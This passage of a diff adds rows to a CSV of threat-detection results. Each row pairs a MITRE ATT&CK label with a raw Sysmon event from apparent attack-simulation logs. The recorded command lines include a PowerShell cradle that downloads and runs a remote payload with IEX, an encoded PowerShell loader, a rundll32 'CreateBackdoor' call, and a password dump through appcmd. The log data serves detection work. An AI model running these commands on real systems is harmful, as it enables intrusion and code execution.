+    <Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-FD85-5CEB-0000-00104C0E0B00</Data>
+    <Data Name=""ParentProcessId"">1944</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\notepad.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\notepad.exe&quot;</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1223] Compiled HTML File,1564126754.409237,2019-07-26T11:39:14.409237+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\hh.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-26T07:39:14.375565Z"">
+    </TimeCreated>
+    <EventRecordID>4348</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""5924"" ThreadID=""6056"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-26 07:39:14.345</Data>
+    <Data Name=""ProcessGuid"">747F3D96-AE22-5D3A-0000-001096B24E00</Data>
+    <Data Name=""ProcessId"">1504</Data>
+    <Data Name=""Image"">C:\Windows\hh.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Microsoft® HTML Help Executable</Data>
+    <Data Name=""Product"">HTML Help</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\hh.exe&quot; C:\Users\IEUser\Desktop\Fax Record N104F.chm</Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-ABD5-5D3A-0000-0020EB990F00</Data>
+    <Data Name=""LogonId"">0xf99eb</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=4B1E2F8EFBECB677080DBB26876311D9E06C5020,MD5=1CECEE8D02A8E9B19D3A1A65C7A2B249,SHA256=8AB2F9A4CA87575F03F554AEED6C5E0D7692FA9B5D420008A1521F7F7BD2D0A5,IMPHASH=D3D9C3E81A404E7F5C5302429636F04C</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-ABD7-5D3A-0000-001012661000</Data>
+    <Data Name=""ParentProcessId"">4940</Data>
+    <Data Name=""ParentImage"">C:\Windows\explorer.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\Explorer.EXE</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1584766825.20521,2020-03-21T09:00:25.205210+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-03-21T05:00:25.195377Z"">
+    </TimeCreated>
+    <EventRecordID>243534</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2860"" ThreadID=""3508"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-03-21 05:00:24.993</Data>
+    <Data Name=""ProcessGuid"">747F3D96-9F68-5E75-0000-0010B9662000</Data>
+    <Data Name=""ProcessId"">7420</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
+    <Data Name=""ParentProcessId"">1652</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.20521,2020-03-21T09:00:25.205210+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-03-21T05:00:25.195377Z"">
+    </TimeCreated>
+    <EventRecordID>243534</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2860"" ThreadID=""3508"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-03-21 05:00:24.993</Data>
+    <Data Name=""ProcessGuid"">747F3D96-9F68-5E75-0000-0010B9662000</Data>
+    <Data Name=""ProcessId"">7420</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
+    <Data Name=""ParentProcessId"">1652</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1584766825.20521,2020-03-21T09:00:25.205210+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-03-21T05:00:25.195377Z"">
+    </TimeCreated>
+    <EventRecordID>243534</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2860"" ThreadID=""3508"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-03-21 05:00:24.993</Data>
+    <Data Name=""ProcessGuid"">747F3D96-9F68-5E75-0000-0010B9662000</Data>
+    <Data Name=""ProcessId"">7420</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
+    <Data Name=""ParentProcessId"">1652</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920559.143393,2019-05-27T05:29:19.143393+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot;  list vdir /text:password ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-27T01:29:19.143393Z"">
+    </TimeCreated>
+    <EventRecordID>5949</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""324"" ThreadID=""2260"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-27 01:29:19.103</Data>
+    <Data Name=""ProcessGuid"">365ABB72-3D6F-5CEB-0000-001066B5FF00</Data>
+    <Data Name=""ProcessId"">2796</Data>
+    <Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
+    <Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Application Server Command Line Admin Tool</Data>
+    <Data Name=""Product"">Internet Information Services</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot;  list vdir /text:password</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
+    <Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
+    <Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
+    <Data Name=""LogonId"">0x82423</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
+    <Data Name=""ParentProcessId"">2584</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot;  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[ T1059 ] wscript or cscript runing script,1564434679.865791,2019-07-30T01:11:19.865791+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run wscript or cscript with Command Line (&quot;C:\Windows\System32\wscript.exe&quot; /e:JScript.Encode /nologo C:\Users\IEUser\AppData\Local\Temp\info.txt) and Parent Image :C:\Windows\SysWOW64\rundll32.exe , Parent CommandLine (&quot;C:\Windows\SysWOW64\rundll32.exe&quot; &quot;C:\Windows\SysWOW64\shell32.dll&quot;,#44 &quot;C:\Users\IEUser\Downloads\Invoice@0582.cpl&quot;,) in directory : ( C:\Users\IEUser\AppData\Local\Temp\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:11:19.098105Z"">
+    </TimeCreated>
+    <EventRecordID>4865</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:11:19.010</Data>
+    <Data Name=""ProcessGuid"">747F3D96-60F7-5D3F-0000-00106F2F5600</Data>
+    <Data Name=""ProcessId"">6160</Data>
+    <Data Name=""Image"">C:\Windows\SysWOW64\wscript.exe</Data>
+    <Data Name=""FileVersion"">5.812.10240.16384</Data>
+    <Data Name=""Description"">Microsoft ® Windows Based Script Host</Data>
+    <Data Name=""Product"">Microsoft ® Windows Script Host</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\wscript.exe&quot; /e:JScript.Encode /nologo C:\Users\IEUser\AppData\Local\Temp\info.txt</Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\AppData\Local\Temp\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-0020B5314100</Data>
+    <Data Name=""LogonId"">0x4131b5</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=5D7F2AFD2FF69D379B69DD94033B51EC537E8E52,MD5=F2748908C6B873CB1970DF4C07223E72,SHA256=0FBB4F848D9FB14D7BF81B0454203810869C527C3435E8747A2213DD86F8129A,IMPHASH=3602F3C025378F418F804C5D183603FE</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-60F5-5D3F-0000-0010A8D75500</Data>
+    <Data Name=""ParentProcessId"">4884</Data>
+    <Data Name=""ParentImage"">C:\Windows\SysWOW64\rundll32.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\SysWOW64\rundll32.exe&quot; &quot;C:\Windows\SysWOW64\shell32.dll&quot;,#44 &quot;C:\Users\IEUser\Downloads\Invoice@0582.cpl&quot;,</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1074] Data Staged - Process,1564436003.232566,2019-07-30T01:33:23.232566+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd  /c powershell -c &quot;(New-Object Net.WebClient).DownloadFile(&apos;https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt&apos;,&apos;Default_File_Path.ps1&apos;);IEX((-Join([IO.File]::ReadAllBytes(&apos;Default_File_Path.ps1&apos;)|ForEach-Object{[Char]$_})))&quot; )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:33:23.215719Z"">
+    </TimeCreated>
+    <EventRecordID>4910</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:33:23.170</Data>
+    <Data Name=""ProcessGuid"">747F3D96-6623-5D3F-0000-001011F68700</Data>
+    <Data Name=""ProcessId"">5816</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">cmd  /c powershell -c &quot;(New-Object Net.WebClient).DownloadFile(&apos;https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt&apos;,&apos;Default_File_Path.ps1&apos;);IEX((-Join([IO.File]::ReadAllBytes(&apos;Default_File_Path.ps1&apos;)|ForEach-Object{[Char]$_})))&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
+    <Data Name=""ParentProcessId"">1208</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564436003.232566,2019-07-30T01:33:23.232566+04:00,,Threat,Low,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd  /c powershell -c &quot;(New-Object Net.WebClient).DownloadFile(&apos;https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt&apos;,&apos;Default_File_Path.ps1&apos;);IEX((-Join([IO.File]::ReadAllBytes(&apos;Default_File_Path.ps1&apos;)|ForEach-Object{[Char]$_})))&quot; )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:33:23.215719Z"">
+    </TimeCreated>
+    <EventRecordID>4910</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:33:23.170</Data>
+    <Data Name=""ProcessGuid"">747F3D96-6623-5D3F-0000-001011F68700</Data>
+    <Data Name=""ProcessId"">5816</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">cmd  /c powershell -c &quot;(New-Object Net.WebClient).DownloadFile(&apos;https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt&apos;,&apos;Default_File_Path.ps1&apos;);IEX((-Join([IO.File]::ReadAllBytes(&apos;Default_File_Path.ps1&apos;)|ForEach-Object{[Char]$_})))&quot;</Data>
